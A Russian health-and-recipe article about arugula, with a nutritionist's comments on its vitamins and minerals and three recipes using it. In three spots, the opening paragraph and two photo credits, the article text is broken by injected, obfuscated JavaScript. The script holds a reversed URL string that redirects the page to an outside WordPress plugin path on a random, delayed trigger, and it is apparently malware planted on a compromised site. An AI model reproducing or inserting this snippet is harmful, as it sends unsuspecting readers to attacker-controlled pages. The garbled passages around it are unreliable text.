Рукола имеет пряный вкус и продаётся в большинстве супермаркетов. Лето — лучшее время для того, чтобы включить эту зелень в свой рацион. fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru объясняет, чем полезна рукола и как её есть, вместе с Ларисой Бавыкиной, врачом-эндокринологом и диетологом, генетиком медицинского центра «Атлас».
Рукола — один из самых доступных видов зелени. Она относится к тому же семейству растений, что брокколи и капуста. Рукола на 90% состоит из воды, содержит витамины, минералы и антиоксиданты. Учёные полагают, что любая листовая зелень помогает предотвратить потерю памяти. Исследование американских учёных показало, что в руколе есть вещества, способные бороться с раковыми клетками.
Фото: shutterstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tock.com
Лариса Бавыкина
врач-эндокринолог и диетолог, генетик медицинского центра «Атлас»
— Рукола — тёмно-зелёное растение, которое содержит много клетчатки. В ней, как и в любой зелени, почти нет сахара, калорий, углеводов и жиров. Кроме этого, рукола богата:
-
фолиевой кислотой (витамином В9), которая участвует в синтезе ДНК и особенно важна во время беременности для нормального развития плода. Нужно есть одну порцию зелёных фруктов и овощей ежедневно, чтобы получить нужное количество витамина В9;
-
калием, который необходим для поддержания работы сердца и нервной системы;
-
кальцием, который укрепляет кости, способствует профилактике остеопороза. Кальция в руколе больше, чем в салате айсберг, в шесть раз;
-
витамином К. В 100 г руколы содержится суточная норма этого витамина. Витамин К улучшает свёртываемость крови, участвует в обмене веществ, помогает усваиваться кальцию. Исследование, в котором участвовали 72 327 женщин, показало, что недостаточное употребление витамина К увеличивает риск перелома бедра;
-
витамином С, который способствует усвоению железа из пищи, а также участвует в синтезе интерферона — вещества, которое отвечает за иммунный ответ на вторжение в организм вирусов.
Рукола обладает пряным вкусом, поэтому хорошо дополняет овощные салаты, морепродукты и мясные блюда. Итальянская пицца неизменно готовится с руколой. Эта зелень также входит в некоторые виды песто.
В отличие от сельдерея, латука и базилика руколу не получится вырастить на подоконнике. Если у вас есть загородный участок, попробуйте вырастить свою руколу. Она требует минимального ухода. Упаковки свежей руколы продаются в большинстве супермаркетов. Обратите внимание на состояние зелени внутри упаковки. Не берите, если часть руколы жёлтого цвета, подвядшая или влажная — скорее всего, она уже испортилась.
Фото: shutterstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tock.com
Как есть больше зелени
Лето — пора свежей зелени. Пучки петрушки, кинзы, укропа, руколы, шпината храните в холодильнике в банке с водой. Или же на каждый пучок можно надеть полиэтиленовый пакет, смоченный изнутри водой. Так зелень останется хрустящей и свежей несколько дней. Если вам не нравится есть зелень в чистом виде, приготовьте с ней песто, смузи (ягоды вкусно дополняет базилик), крем-суп или большой яркий салат с сезонными овощами. Добавьте руколу в сэндвич или утренний омлет.
Лариса Бавыкина
врач-эндокринолог и диетолог, генетик медицинского центра «Атлас»
— Ежедневное потребление листовой зелени снижает риск развития сердечно-сосудистых заболеваний, ожирения и других проблем со здоровьем. Вот простые способы есть больше зелени:
- сделайте свежую зелень легко доступной, пусть она всегда лежат в холодильнике;
- купите красивую кулинарную книгу с рецептами, наверняка вам захочется приготовить какой-нибудь простой и красивый салат;
- пейте смузи или соки из зелени и овощей;
- добавляйте зелень к каждому блюду, которое вы готовите или едите;
- возьмите за правило съедать 4-5 порций овощей и фруктов ежедневно. Именно столько рекомендуют съедать эксперты Всемирной организации здравоохранения. Порция — небольшой овощ, зажатый между большим и указательным пальцами.
7 способов добавить овощей в свой рацион
Что приготовить с руколой
370 calories
Салат из руколы с инжиром, орехами и козьим сыром
Салат с разными текстурами и оттенками вкуса идеален для летнего ланча в жаркую погоду.
Салат из руколы с инжиром, орехами и козьим сыром
СЛОЖНОСТЬ РЕЦЕПТА:
ВРЕМЯ ПРИГОТОВЛЕНИЯ:
15 минут
КОЛИЧЕСТВО ПОРЦИЙ:
4 порции
КАЛОРИЙНОСТЬ:
370 ккал
Сложность
Время
15 минут
Кол-во порций
4 порции
Калорийность
370 ккал
Ингредиенты
Сыр (козий)
3/4 стакана
Морковь
1 шт.
Инжир
5 шт.
Рукола
1 упаковка
Нут (готовый)
300 г
Мёд
1 ч. л.
Оливковое масло
3 ст. л.
Орехи (грецкие)
1/2 стакана
Соус (бальзамический)
2 ч. л.
Процесс приготовления
- Смешайте бальзамик, мёд и оливковое масло.
- В большой миске смешайте нут, грецкие орехи, руколу, тёртую морковь и кусочки инжира.
- Добавьте заправку, перемешайте, выложите сверху козий сыр и подавайте.
547 calories
Боул с киноа, руколой, персиком и авокадо
Разноцветный боул зарядит энергией, витаминами, клетчаткой, а ещё полезными растительными жирами.
Боул с киноа, руколой, персиком и авокадо
СЛОЖНОСТЬ РЕЦЕПТА:
ВРЕМЯ ПРИГОТОВЛЕНИЯ:
5 минут
КОЛИЧЕСТВО ПОРЦИЙ:
1 порция
КАЛОРИЙНОСТЬ:
547 ккал
Сложность
Время
5 минут
Кол-во порций
1 порция
Калорийность
547 ккал
Ингредиенты
Киноа (отварная)
3/4 стакана
Рукола
1 стакан
Авокадо
1/2 шт.
Оливковое масло
2 ч. л.
Соль
1 щепотка
Перец
1 щепотка
Персики
1 шт.
Орехи (кедровые)
1 горсть
Сыр (брынза)
50 г
Процесс приготовления
- В глубокой тарелке смешайте киноа, кусочки авокадо, персика и орехи.
- Полейте маслом, посолите, поперчите, сверху выложите измельчённый сыр и подавайте.
397 calories
Цельнозерновая пицца с зелёным песто
Эта вкусная пицца на уже готовой основе — быстрое полноценное блюдо на обед или в качестве закуски.
Цельнозерновая пицца с зелёным песто
СЛОЖНОСТЬ РЕЦЕПТА:
ВРЕМЯ ПРИГОТОВЛЕНИЯ:
25 минут
КОЛИЧЕСТВО ПОРЦИЙ:
4 порции
КАЛОРИЙНОСТЬ:
397 ккал
Сложность
Время
25 минут
Кол-во порций
4 порции
Калорийность
397 ккал
Ингредиенты
Тесто (основа для пиццы из цельнозерновой муки)
1 шт.
Тыква (сквош, нарезанная и запечённая)
1 шт.
Рукола
3 стакана
Сельдерей (листья)
1/2 стакана
Орехи (грецкие)
1/3 стакана
Лимон (сок)
2 ст. л.
Чеснок
1 зубчик
Сыр (пармезан)
1/4 стакана
Оливковое масло
3 ст. л.
Сыр (козий)
1/3 стакана
Соль
1 щепотка
Перец
1 щепотка
Процесс приготовления
- Духовку разогрейте до 200 градусов.
- Основу для пиццы запеките в течение 5 минут на противне.
- В блендере измельчите руколу, орехи, сельдерей, чеснок и смешайте с соком лимона и тёртым пармезаном.
- Добавьте масло и ещё раз смешайте в блендере.
- Тыкву пюрируйте с солью и перцем. Выложите тыквенное пюре поверх основы, сверху добавьте песто и покрошите козий сыр.
- Запекайте в течение 10 минут.
Статьи по теме
Рецепт дня: зелёный салат с фасолью лима, тыквой и брокколи
4 рецепта со шпинатом на завтрак, обед и ужин
Чем полезен салат айсберг и как его есть
Зелёный микс-салат с авокадо